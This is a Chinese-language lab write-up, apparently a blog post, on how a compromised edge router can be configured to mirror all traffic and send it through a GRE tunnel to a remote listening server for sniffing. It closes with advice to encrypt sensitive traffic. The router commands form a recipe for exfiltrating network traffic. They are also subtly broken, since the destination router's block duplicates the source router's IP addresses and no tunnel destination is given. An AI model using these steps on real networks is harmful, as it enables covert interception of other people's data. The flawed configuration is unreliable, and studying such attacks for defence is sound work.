路由器流量重定向技术危害及防范说明

一般情况下，企业或组织的出口路由器往往部署在防火墙以外，缺乏安全保护，所以很容易失控。而一旦边界路由器被入侵，则很可能被用来进行流量重定向，导致数据失泄密风险。

这篇文档中，我利用模拟器构建了一个实验环境，模拟了某台路由器被入侵后，导致进出网络流量被重定向的情况。

一、实验环境

如图所示，网络A的主机访问目标主机B，由于出口路由器被入侵，导致所有数据被镜像后重定向到目标路由器，并最终被发送到监听服务器。

测试拓扑图

二、配置思路

1. 首先在出口路由器上设置镜像口，复制指定的、感兴趣的、甚至是所有的进出口流量；
2. 通过GRE的tunnel隧道技术，在网络层添加一个IP头，从而实现流量想重定向到哪里，就重定向到哪里的目标；
3. 在目标路由器下，挂接监听服务器。

三、具体配置

第一步：配置镜像口

# 设置远程监听服务器(192.168.3.2)
observe-server destination-ip 192.168.3.2 source-ip 192.168.1.1
# 选择监听端口
interface GigabitEthernet0/0/0
 ip address 192.168.1.1 255.255.255.0 
 mirror to observe-server inbound

第二步：设置Gre隧道

[SrcRouter]
# 10.1.1.1为源路由器隧道IP， 10.1.1.2为目标路由器隧道IP
# 192.168.12.1为源路由器互联口IP，192.168.12.2为目标路由器互联口IP
interface Tunnel0/0/1
 description 192.168.12.2
 ip address 10.1.1.1 255.255.255.0
 tunnel-protocol gre
 source 192.168.12.1
[DstRouter]
interface Tunnel0/0/1
 description 192.168.12.2
 ip address 10.1.1.1 255.255.255.0
 tunnel-protocol gre
 source 192.168.12.1

第三步：那就非常简单了，开启监听服务器的网口混杂模式，Sniff走起吧。

四、结论

一旦数据丢失了，很容易暴露内部网络和数据通联情况。所以网络运维必须高度重视数据安全问题，特别是网络中的重要数据和隐私流量，一定要加密处理。